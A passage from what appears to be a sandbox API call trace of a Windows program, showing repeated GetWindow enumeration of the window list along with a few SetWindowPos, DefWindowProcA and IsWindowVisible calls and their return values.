(hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.568] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.568] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.568] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.568] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.568] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.569] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.569] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.569] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.569] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.569] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.569] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.569] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.569] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.569] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.569] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.569] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.569] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.569] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.569] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.569] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.569] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.569] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.569] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.569] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.569] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.569] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.570] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.570] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.570] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.570] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.570] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.570] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.570] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.570] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.570] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.570] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.570] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.570] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.570] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.570] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.570] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.570] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.570] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.570] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.570] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.570] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.570] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.570] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.570] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.570] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.570] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.570] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.570] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.571] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.571] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.571] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.571] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.571] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.571] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.571] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.571] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.571] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.571] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.571] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.571] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.571] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.571] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.571] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.571] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.571] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.571] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.571] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.571] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.571] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.571] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.571] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.571] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.571] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.571] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.571] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.571] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.571] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.571] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.571] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.572] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.572] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.572] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.572] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.572] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.572] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.572] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.572] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.572] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.572] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.572] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.572] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.572] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.572] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.572] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.572] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.572] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.572] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.572] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.572] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.572] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.572] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.572] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.572] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.572] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.572] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.572] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.572] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.572] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.572] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.572] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.572] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.573] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.573] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.573] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.573] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.573] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.573] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.573] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.573] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.573] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.573] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.573] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.573] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.573] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.573] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.573] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.573] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.573] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.573] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.573] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.573] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.573] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.573] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.573] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.573] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.573] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.573] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.573] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.573] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.573] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.573] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.573] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.573] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.574] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.574] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.574] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.574] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.574] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.574] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.574] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.574] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.574] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.574] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.574] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.574] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.574] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.574] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.574] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.574] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.574] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.574] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.574] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.574] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.574] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.574] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.574] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.574] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.574] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.575] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.575] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.575] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.575] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.575] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.575] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.575] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.575] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.575] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.575] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.575] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.575] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.575] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.575] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.575] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.575] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.575] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.575] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.575] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.575] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.575] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.575] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.575] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.575] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.575] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.575] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.575] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.575] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.575] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.576] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.576] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.576] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.576] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.576] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.576] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.576] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.576] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.576] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.576] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.576] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.576] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.576] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.576] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.576] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.576] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.576] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.576] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.576] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.576] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.576] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.576] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.576] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.576] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.576] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.577] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.577] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.577] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.577] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.577] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.577] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.577] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.577] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.577] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.577] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.577] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.577] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.577] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.577] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.577] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.577] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.577] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.577] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.577] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.577] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.577] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.577] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.577] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.577] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.578] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.578] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.578] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.578] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.578] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.578] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.578] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.578] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.578] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.578] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.578] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.578] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.578] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.578] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.578] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.578] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.578] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.578] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.578] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.578] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.578] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.578] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.578] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.578] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.578] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.578] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.579] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.579] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.579] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.579] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.579] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.579] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.579] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.579] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.579] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.579] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.579] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.579] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.579] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.579] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.579] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.579] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.579] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.579] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.579] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.579] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.579] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.579] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.579] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.579] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.580] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.580] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.580] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.580] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.580] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.580] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.580] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.580] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.580] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.580] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.580] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.580] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.580] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.580] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.580] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.580] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.580] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.580] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.580] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.580] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.580] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.580] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.580] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.580] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.580] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.580] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.580] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.580] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.580] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.580] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.580] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.580] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.581] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.581] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.581] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.581] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.581] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.581] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.581] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.581] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.581] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.581] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.581] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.581] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.581] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.581] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.581] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.581] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.581] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.581] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.581] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.581] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.581] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.581] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.581] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.581] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.581] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.581] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.581] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.581] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.581] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.581] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.581] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.581] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.581] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.582] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.582] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.582] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.582] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.582] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.582] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 